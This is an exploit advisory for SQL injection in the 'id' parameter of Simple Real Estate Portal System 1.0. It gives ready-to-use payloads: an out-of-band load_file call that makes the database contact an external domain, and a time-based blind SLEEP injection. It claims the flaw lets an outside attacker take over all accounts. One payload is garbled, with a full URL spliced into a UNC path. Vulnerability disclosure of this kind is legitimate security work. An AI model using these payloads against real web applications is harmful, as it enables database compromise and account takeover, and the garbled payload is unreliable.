Simple Real Estate Portal System 1.0 SQL Injection

`## Title: Simple Real Estate Portal System v1.0 remote SQL-Injections  
## Author: nu11secur1ty  
## Date: 02.20.2022  
## Vendor: https://www.sourcecodester.com/users/tips23  
## Software: https://www.sourcecodester.com/php/15184/simple-real-estate-portal-system-phpoop-free-source-code.html  
  
  
## Description:  
The id parameter appears to be vulnerable to SQL injection attacks.  
The payload '+(select  
load_file('\\\\2bej8mzxoxsqpel4hbll4ar23t9mxjlaoyfl69v.http://stupid_asshole.com\\foh'))+'  
was submitted in the id parameter.  
This payload injects a SQL sub-query that calls MySQL's load_file  
function with a UNC file path that references a URL on an external  
domain.  
The application interacted with that domain, indicating that the  
injected SQL query was executed.  
The attacker from outside can take control of all accounts of this  
system by using this vulnerability!  
WARNING: If this is in some external domain, or some subdomain, or  
internal, this will be extremely dangerous!  
Status: CRITICAL  
  
  
[+] Payloads:  
  
```mysql  
---  
Parameter: id (GET)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: p=view_estate&id=2'+(select  
load_file('\\\\2bej8mzxoxsqpel4hbll4ar23t9mxjlaoyfl69v.https://www.sourcecodester.com/php/15184/simple-real-estate-portal-system-phpoop-free-source-code.html\\foh'))+''  
AND (SELECT 2183 FROM (SELECT(SLEEP(3)))uXKK) AND 'NnWW'='NnWW  
---  
  
```  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/oretnom23/2022/Simple-Real-Estate-Portal-System)  
  
## Proof and Exploit:  
[href](https://streamable.com/lffled)  
  
  
`